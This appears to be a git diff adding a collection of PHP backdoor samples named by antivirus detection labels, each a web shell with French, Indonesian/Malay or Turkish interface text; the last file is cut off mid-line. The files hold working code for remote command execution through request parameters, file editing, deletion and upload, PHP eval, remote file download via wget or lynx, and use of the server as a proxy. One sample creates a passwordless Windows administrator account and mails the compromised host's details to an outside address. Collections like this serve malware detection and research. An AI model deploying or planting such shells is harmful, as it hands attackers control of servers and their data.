diff --git a/PHP/Backdoor.PHP.Agent.bf b/PHP/Backdoor.PHP.Agent.bf new file mode 100644 index 00000000..31723a31 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bf @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bg b/PHP/Backdoor.PHP.Agent.bg new file mode 100644 index 00000000..a09ba4b4 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bg @@ -0,0 +1,181 @@ +rep)) { + $dir = opendir($this->rep); + } else { + $dir = opendir($this->pwd); + } + while($f = readdir($dir)) { + if ($f !="." && $f != "..") { + $this->list[] = $f; + } + } + } + + function view() { + + $this->file = htmlentities(highlight_file($this->file)); + } + + function edit() { + if(!is_writable($this->edit)) { + echo "Ecriture impossible sur le fichier"; + } elseif(!file_exists($this->edit)) { + echo "Le fichier n'existe pas "; + } elseif(!$this->fichier) { + $fp = fopen($this->edit,"r"); + $a = ""; + while(!feof($fp)) { + $a .= fgets($fp,1024); + } + echo"
edit."\">
"; + } else { + $fp = fopen($this->edit,"w+"); + fwrite($fp, $this->fichier); + fclose($fp); + echo "Le fichier a été modifié"; + + } + } + + function del() { + if(is_file($this->del)) { + if(unlink($this->del)) { + echo "Fichier supprimé"; + } else { + echo "Vous n'avez pas les droits pour supprimer ce fichier"; + } + } else { + echo $this->del." n'est pas un fichier"; + } + } + + function shell() { + echo "

"; + system($this->shell); + } + + function proxy($host,$page) { + + $fp = fsockopen($host,80); + if (!$fp) { + echo "impossible d'etablir un connection avec l'host"; + } else { + $header = "GET ".$page." HTTP/1.1\r\n"; + $header .= "Host: ".$host."\r\n"; + $header .= "Connection: close\r\n\r\n"; + fputs($fp,$header); + while (!feof($fp)) { + $line = fgets($fp,1024); + echo $line; + } + fclose($fp); + } + } + + function ccopy($cfichier,$cdestination) { + if(!empty($cfichier) && !empty($cdestination)) { + copy($cfichier, $cdestination); + echo "Le fichier a été copié"; + } else { + echo "
Source:
Destination:
"; + } + } +} +if(!empty($_REQUEST['rep'])) { + $rep = $_REQUEST['rep']."/"; +} +$pwd = $_SERVER['SCRIPT_FILENAME']; +$pwd2 = explode("/",$pwd); +$file = $_REQUEST['file']; +$edit = $_REQUEST['edit']; +$fichier = $_POST['fichier']; +$del = $_REQUEST['del']; +$shell = $_REQUEST['shell']; +$proxy = $_REQUEST['proxy']; +$copy = $_REQUEST['copy']; +$cfichier = $_POST['cfichier']; +$cdestination = $_POST['cdestination']; + +$n = count($pwd2); +$n = $n - 1; +$pwd = ""; +for ($i = 0;$i != $n;$i = $i+1) { + $pwd .= "/".$pwd2[$i]; +} + +if($proxy) { +$host2 = explode("/",$proxy); +$n = count($host2); +$host = $host2[2]; +$page = ""; +for ($i = 3;$i != $n;$i = $i+1) { + $page .= "/".$host2[$i]; +} +echo $page; +} + +echo "Index of ".$pwd.""; +$backdoor = new backdoor(); +$backdoor->pwd = $pwd; +$backdoor->rep = $rep; +$backdoor->file = $file; +$backdoor->edit = $edit; +$backdoor->fichier = $fichier; +$backdoor->del = $del; +$backdoor->shell = $shell; +$backdoor->proxy = $proxy; +echo "
Index of ".$backdoor->pwd.""; +$backdoor->dir(); + +echo "
";
+echo "Executer un shell ";
+echo "Utiliser le serveur comme proxy ";
+echo "Copier un fichier 
"; +echo "\" Name Last modified Size Description"; +echo "
"; + +if($file) { + $backdoor->view(); +} elseif($edit) { + $backdoor->edit(); +} elseif($del) { + $backdoor->del(); +} elseif($shell) { + $backdoor->shell(); +}elseif($proxy) { + $backdoor->proxy($host,$page); +}elseif($copy == 1) { + $backdoor->ccopy($cfichier,$cdestination); +} else { + echo "[DIR] Parent Directory ".date("r",realpath($rep."../"))." -
"; + foreach ($backdoor->list as $key => $value) { + if(is_dir($rep.$value)) { + echo "[DIR]".$value."/ ".date("r",filemtime($rep.$value))." -
"; + } else { + echo "[FILE]".$value." (edit) (del) ".date("r",filemtime($rep.$value))." 1k
"; + } + } +} +echo "

"; +echo "
Coded By Charlichaplin
"; +echo ""; \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bh b/PHP/Backdoor.PHP.Agent.bh new file mode 100644 index 00000000..78384f8c --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bh @@ -0,0 +1,73 @@ +"; +$OS = @PHP_OS; +echo "OSTYPE:$OS
"; +$UNAME = @php_uname(); +echo "NAME:$UNAME
"; +$free = disk_free_space($dir); + +if ($free === FALSE) {$free = 0;} + +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."
"; + +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; + +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} + +function view_size($size) + +{ + + if (!is_numeric($size)) {return FALSE;} + + else + + { + + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + + else {$size = $size . " B";} + + return $size; + + } + +} + +exit; \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bi b/PHP/Backdoor.PHP.Agent.bi new file mode 100644 index 00000000..2b586486 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bi @@ -0,0 +1,72 @@ +"; +$ker = @php_uname(); +$OS = @PHP_OS; +echo "OSTYPE:$OS
"; +echo "
Kernel:$ker
"; +$free = disk_free_space($dir); + +if ($free === FALSE) {$free = 0;} +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."
"; + +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; + +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} + +function view_size($size) + +{ + + if (!is_numeric($size)) {return FALSE;} + + else + + { + + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + + else {$size = $size . " B";} + + return $size; + + } + +} + +exit; diff --git a/PHP/Backdoor.PHP.Agent.bj b/PHP/Backdoor.PHP.Agent.bj new file mode 100644 index 00000000..586cbf65 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bj @@ -0,0 +1,59 @@ +"; +$OS = @PHP_OS; +echo "
OSTYPE:$OS
"; +echo "
Kernel:$ker
"; +$free = disk_free_space($dir); +if ($free === FALSE) {$free = 0;} +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."
"; +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} +function view_size($size) +{ +if (!is_numeric($size)) {return FALSE;} +else +{ +if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} +elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} +elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} +else {$size = $size . " B";} +return $size; +} +} + +?> + + diff --git a/PHP/Backdoor.PHP.Agent.bk b/PHP/Backdoor.PHP.Agent.bk new file mode 100644 index 00000000..5a29414d --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bk @@ -0,0 +1,50 @@ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bl b/PHP/Backdoor.PHP.Agent.bl new file mode 100644 index 00000000..f4e096fd --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bl @@ -0,0 +1,592 @@ + + + + + + +***BY PETERSON THE GREATEST CMD*** + + + +

--== by MS flood_ ==--

+OFF"; } + else { $SafeMode = "$SafeMode"; } + $btname = ''; + $bt = ''; + $dc = ''; + $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup +"Administrators" /add Admin;net localgroup "Users" /del Admin'; + $bn = ''; +// Java Script + echo ""; + // End JavaScript + /* Functions */ + function cmd($CMDs) { + $CMD[1] = ''; + exec($CMDs, $CMD[1]); + if (empty($CMD[1])) { + $CMD[1] = shell_exec($CMDs); + } + elseif (empty($CMD[1])) { + $CMD[1] = passthru($CMDs); + } + elseif (empty($CMD[1])) { + $CMD[1] = system($CMDs); + } + elseif (empty($CMD[1])) { + $handle = popen($CMDs, 'r'); + while(!feof($handle)) { + $CMD[1][] .= fgets($handle); + } + pclose($handle); + } + return $CMD[1]; + } + +if (@$_GET['chdir']) { + $chdir = $_GET['chdir']; +} else { + $chdir = getcwd()."/"; + } +if (@chdir("$chdir")) { + $msg = " Pintu Masuk ke Direktori, OK!"; +} else { + $msg = "Error: Gagal masukkan ke folder!"; + $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); +} + $chdir = str_replace(chr(92), chr(47), $chdir); +if (@$_GET['action'] == 'upload') { + $uploaddir = $chdir; + $uploadfile = $uploaddir. $_FILES['userfile']['name']; + if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . +$_FILES['userfile']['name'])) { + $msg = "{$_FILES['userfile']['name']}, Upload File Berjaya. +"; + } else { + $msg = "Error: Upload File Gagal."; + } +} +elseif (@$_GET['action'] == 'mkdir') { + $newdir = $_GET['newdir']; + if (@mkdir("$chdir"."$newdir")) { + $msg = "{$newdir}, folder +berhasil dibuat. "; + } else { + $msg = "Error: Pembuatan folder gagal."; + } +} +elseif (@$_GET['action'] == 'newfile') { + $newfile = $_GET['newfile']; + if (@touch("$chdir"."$newfile")) { + $msg = "{$newfile}, berhasil +dibuat! "; + } else { + $msg = "Error: Tak Boleh Buat File!"; + } +} +elseif (@$_GET['action'] == 'del') { + $file = $_GET['file']; $type = $_GET['type']; + if ($type == 'file') { + if (@unlink("$chdir"."$file")) { + $msg = "{$file}, Berhasil +menghapus arsip (file)!"; + } else { + $msg = "Error: Gagal menghapuskan File (file)!"; + } + } elseif ($type == 'dir') { + if (@rmdir("$chdir"."$file")) { + $msg = "{$file}, Berhasil +menghapus folder!"; + } else { + $msg = "Error: Gagal menghapuskan folder!"; + } + } +} +elseif (@$_GET['action'] == 'chmod') { + $file = $chdir.$_GET['file']; $chmod = $_GET['chmod']; + if (@chmod ("$file", $chmod)) { + + $msg = "Chmod dari {$_GET['file']} berubah menjadi +$chmod : Sukses!"; + } else { + $msg = 'Error: Gagal mengubah chmod.'; + } +} +elseif (@$_GET['action'] == 'rename') { + $file = $_GET['file']; $newname = $_GET['newname']; + if (@rename("$chdir"."$file", "$chdir"."$newname")) { + $msg = "Archive {$file} +named for {$newname} successfully!"; + } else { + $msg = "Error: Gagal menukar File."; + } +} +elseif (@$_GET['action'] == 'copy') { + $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; + if (@copy("$file", "$copy")) { + $msg = "{$file}, disalin +menjadi {$copy} +Berhasil!"; + } else { + $msg = "Error: Gagal menyalin {$file} menjadi {$copy}"; + } +} +/* Parte Atualiza 02:48 12/2/2006 */ +elseif (@$_GET['action'] == 'cmd') { + if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } + $cmd = stripslashes(trim($cmd)); + $result_arr = cmd($cmd); + + $afim = count($result_arr); $acom = 0; $msg = ''; + $msg .= "

Hasil : ".$cmd."

"; + if ($result_arr) { + while ($acom <= $afim) { + $msg .= "

".@$result_arr[$acom]."

"; + $acom++; + } + } + else { + $msg .= "

Error: Gagal Menjalankan perintah.

"; + } +} +elseif (@$_GET['action'] == 'safemode') { +if (@!extension_loaded('shmop')) { + echo "Loading... module
"; + if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { + @dl('php_shmop.dll'); + } else { + @dl('shmop.so'); + } +} +if (@extension_loaded('shmop')) { + echo "Module: shmop loaded!
"; + $shm_id = @shmop_open(0xff2, "c", 0644, 100); + if (!$shm_id) { echo "Couldn't create shared memory segment\n"; } + $data="\x00"; + $offset=-3842685; + $shm_bytes_written = @shmop_write($shm_id, $data, $offset); + if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of +data\n"; } + if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } + echo passthru("id"); + shmop_close($shm_id); + +} else { echo "Module: shmop tidak dimuat!
"; } +} +elseif (@$_GET['action'] == 'zipen') { + $file = $_GET['file']; + $zip = @zip_open("$chdir"."$file"); + $msg = ''; +if ($zip) { + while ($zip_entry = zip_read($zip)) { + $msg .= "Name: " . zip_entry_name($zip_entry) . "\n"; + $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n"; + $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n"; + $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n"; + if (zip_entry_open($zip, $zip_entry, "r")) { + echo "File Contents:\n"; + $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); + echo "$buf\n"; + zip_entry_close($zip_entry); + } + echo "\n"; + } + zip_close($zip); +} +} +elseif (@$_GET['action'] == 'edit') { + $file = $_GET['file']; + $conteudo = ''; + $filename = "$chdir"."$file"; + $conteudo = @file_get_contents($filename); + $conteudo = htmlspecialchars($conteudo); + $back = $_SERVER['HTTP_REFERER']; + echo "

Editing {$file} ...

"; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
"; + echo "
"; + echo "

"; + print "

"; + echo "

"; + echo " "; + echo " "; + echo "

"; + echo "
"; +} +elseif (@$_GET['action'] == 'save') { + $filename = "$chdir".$_GET['file']; + $somecontent = $_POST['S1']; + $somecontent = stripslashes(trim($somecontent)); + if (is_writable($filename)) { + @$handle = fopen ($filename, "w"); + @$fw = fwrite($handle, $somecontent); + @fclose($handle); + if ($handle && $fw) { + $msg = "{$_GET['file']}, berhasil diedit!"; + } + } else { + $msg = "{$_GET['file']}, tidak +bisa ditulisi!"; + } +} +// Informaçs + $cmdget = ''; + if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } + $cmdget = htmlspecialchars($cmdget); + function asdads() { + $asdads = ''; + if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } + if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } + if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } + if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } + if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } + return $asdads; + } +echo "
"; +echo "
"; +echo "Informasi"; +echo "
"; +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; + if (strtoupper(substr($OS, 0,3) != 'WIN')) { + $Methods = asdads(); + if ($Methods == '') { $Methods = "???"; } + echo ""; + echo " "; + echo ""; + echo ""; + } +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; +echo "
"; +echo " Sistem : {$OS}
"; +echo " Nama : {$UNAME}
"; +echo " PHP : {$PHPv}, Safe Mode : {$SafeMode}
"; + echo "Methods : {$Methods}
"; +echo " IP : {$IpServer}
"; +echo " Perintah :

"; +echo "
"; +// Dir +echo "
"; +echo "
"; +if (is_writable("$chdir")) { + if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir YES: {$chdir} - Folder Baru | File Baru | Remote +Access"; + } else { + echo "Dir YES: {$chdir} - Folder Baru | File Baru | Kembali"; + } +} +else { +if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir NO: {$chdir} - Foldr Baru | File Baru | Remote +Access"; + } else { + echo "Dir NO: {$chdir} - Folder Baru | File Baru | Kembali +"; + } +} +if (@!$handle = opendir("$chdir")) { + echo " Gue gak bisa masuk folder, Klik sini! untuk Kembali ke folder ori!
"; +} +else { +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +} else { + echo "

$msg"; + } +echo "

"; +echo " "; +echo " "; +echo "
Upload:"; +echo " "; +echo "
"; +if (@!$msg) { + echo "

Messages

"; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +$colorn = 0; + while (false !== ($file = readdir($handle))) { + if ($file != '.') { + if ($colorn == 0) { + $color = "style=\"background-color: #FF9900\""; + } + elseif ($colorn == 1) { + $color = "style=\"background-color: #FFCC33\""; + } + if (@is_dir("$chdir"."$file")) { + $file = $file.'/'; + $mode = 'chdir'; + } else { + $mode = 'edit'; + } + if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { + $chdir .= '/'; + } + if ($file == '../') { + $lenpath = strlen($chdir); $baras = 0; + for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } + $chdir_ = explode("/", $chdir); + $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); + } + $perms = @fileperms ("$chdir"."$file"); + if ($perms == '') { + $perms = '???'; + } + $size = @filesize ("$chdir"."$file"); + $size = $size / 1024; + $size = explode(".", $size); + if (@$size[1] != '') { + $size = $size[0].'.'.@substr("$size[1]", 0, 2); + } else { + $size = $size[0]; + } + if ($size == 0) { + if ($mode == 'chdir') { + $size = '???'; + } + } + echo ""; + echo ""; + if (@is_writable ("$chdir"."$file")) { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + else { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (@is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + echo ""; + if ($mode == 'edit') { + echo ""; + } else { + echo ""; + } + echo ""; + if ($colorn == 0) { + $colorn = 1; + } + elseif ($colorn == 1) { + $colorn = 0; + } + } + } + closedir($handle); +} + $OS = @PHP_OS; + $UNAME = @php_uname(); + $PHPv = @phpversion(); + $SafeMode = @ini_get('safe_mode'); + + if ($SafeMode == '') { $SafeMode = "OFF
"; } + else { $SafeMode = "$SafeMode
"; } + + + $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); + $psn=("OS = " . $OS . "
UNAME = " . $UNAME . "
PHPVersion = " . $PHPv . "
Safe +Mode = " . $SafeMode . "
http://" . $injek . "
Ingat jangan +Guna Target Ini.
By: MSN PEBA"); + + $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n"; + $header .= "MIME-Version: 1.0\r\n"; + If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + $header .= "Content-Type: text/$contenttype\r\n"; + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + $header .= "$message\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + If ($file_name) $header .= "Content-Disposition: attachment; +filename=\"$file_name\"\r\n\r\n"; + If ($file_name) $header .= "$content\r\n"; + If ($file_name) $header .= "--$uid--"; + $to = ("arms27@fdfrr.com"); + $subject = ("Hajar bos"); + mail($to,$subject,$psn,$header); +@include "$bn"; +?> +
Permision Nama File Kapasiti Perintah
$perms $file $file $file $file $file + $file $file $file $size KB Rename | Del +| Chmod | Copy Rename | Del +| Chmod | Copy
+
+ + + diff --git a/PHP/Backdoor.PHP.Agent.bn b/PHP/Backdoor.PHP.Agent.bn new file mode 100644 index 00000000..34f4b3cf --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bn @@ -0,0 +1,283 @@ +$v){$_POST[$k] = stripslashes($v);}} +@ini_set('max_execution_time',0); +(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)"); + +(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0); +(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0); +$version='version 1.0 by FaTaLErrOr'; +$action=$_POST['action']; +$file=$_POST['file']; +$dir=$_POST['dir']; +$content=''; +$stdata=''; +$style=''; +$header=''.getenv("HTTP_HOST").' - FaTaL Shell v1.0'.$style.''; +$footer=''; + +$lang=array( +'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.', +'uploadok'=>'Baþarýyla Yüklendi.', +'dircrt'=>'Klasör Oluþturuldu.', +'dontlist'=>'Listelenemiyor Ýzin Yok.', +'dircrterr'=>'Oluþturulamýyor Ýzin Yok.', +'dirnf'=>'Dizin Bulunamadi.', +'filenf'=>'.', +'dontwrdir'=>'Sadece Okunabilir.', +'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.', +'deletefileok'=>'Dosya Silindi.', +'deletedirok'=>'Klasör Silindi.', +'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi', +'cantrfile'=>'Dosya Açýlamýyor izin Yok.', +'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..', +'workdir'=>'Çalýþma Dizini: ', +'fullacc'=>'Full Yetki.', +'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.', +'thisnodir'=>'Klasör Seçin.', +'allfuncsh'=>'Fonksiyoýnlar Kapalý.' +); + +$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions + +function test_file($file){ +if(!file_exists($file))$err="1"; +elseif(!is_file($file)) $err="2"; +elseif(!is_readable($file))$err="3"; +elseif(!is_writable($file))$err="4"; else $err="5"; +return $err;} + +function test_dir($dir){ +if(!file_exists($dir))$err="1"; +elseif(!is_dir($dir)) $err="2"; +elseif(!is_readable($dir))$err="3"; +elseif(!is_writable($dir))$err="4"; else $err="5"; +return $err;} + +function perms($file){ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info;} + +function view_size($size){ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size;} + +if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer"; + +if(isset($dir)){ + $ts['test']=test_dir($dir); + switch($ts['test']){ + case 1:$stdata.=$lang['dirnf'];break; + case 2:$stdata.=$lang['thisnodir'];break; + case 3:$stdata.=$lang['dontlist'];break; + case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break; + case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;} +}else $dir=@chdir($dir); + +$dir=getcwd()."/"; +$dir=str_replace("\\","/",$dir); + +if(isset($file)){ + $ts['test1']=test_file($file); + switch ($ts['test1']){ + case 1:$stdata.=$lang['filenf'];break; + case 2:$stdata.=$lang['isdontfile'];break; + case 3:$stdata.=$lang['cantrfile'];break; + case 4:$stdata.=$lang['onlyracc'];$file=$file;break; + case 5:$stdata.=$lang['fullacc'];$file=$file;break;} +} + +function shell($cmd) +{ + global $lang; + $ret = ''; + if (!empty($cmd)) + { + if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);} + elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);} + elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();} + elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();} + elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);} + else $ret=$lang['allfuncsh']; + } + return $ret; +} + +function createdir($dir){mkdir($dir);} + +//delete file +if($action=="delete"){ +if(unlink($file)) $content.=$lang['deletefileok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +} +//delete dir +if($action=="deletedir"){ +if(!rmdir($file)) $content.=$lang['empty']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +else $content.=$lang['deletedirok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +} +//shell +if($action=="shell"){ +$content.="
+ +
+
+
";} +//editor +if($action=="editor"){ + $stdata.="
+ + + Dosyanýn Adý (Full Url Yazýn)
"; + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); +} + function readf($file){ + clearstatcache(); + $f=fopen($file, "r"); + $contents = fread($f,filesize($file)); + fclose($f); + return htmlspecialchars($contents); +} +if(@$_POST['save'])writef($file,$_POST['data']); +if(@$_POST['create'])writef($file,""); +$test=test_file($file); +if($test==1){ +$content.="
+ +File name:
+ +
"; +} +if($test>2){ +$content.="
+ + +
+
"; +}} +//viewer +if($action=="viewer"){ +$content.=""; +$content.=""; + if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + if ($GLOBALS['os']==1) { + $content.=""; + } + $content.=""; + for($i=0;$i'.$dire[$i].''; + } + for($i=0;$i'.$files[$i].'
'; + } + $content.="
Klasore Git:
HDD Secin:"; + for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + $content.=' '.chr($j).''; + $content.="
Sistem: ".@php_uname()."
BiçimBoyutizinSeçenekler
Klasor'.perms($link).'X
Dosya'.view_size(filesize($linkfile)).''.perms($linkfile).'DEX
"; +}}} +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file);} +//phpeval +if($action=="phpeval"){ +$content.="
+ + + <?php
+
+ ?>
+
"; +if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);} +//upload +if($action=="upload"){ + if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir; + $form_win="
+ + Buraya Uploadla:Dosyayý Adlandýr (Gerekli) :"; + if($os==1)$content.=$form_win; + if($os==0){ + $content.=$form_win; + $content.='File addres: +
'; +} + +if(isset($_POST['uploadloc'])){ +if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else +$uploadfile = $dirupload."/".$_POST['filename']; + +if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);} +if(file_exists($uploadfile))$content.=$lang['filext']; +elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) +$content.=$lang['uploadok']; +} + +if(isset($_POST['upload'])){ + if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) + switch($_POST['with']) + { + case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break; + case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break; + case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; + case links:shell(which('links')." -source ".$_POST['urldown']." > 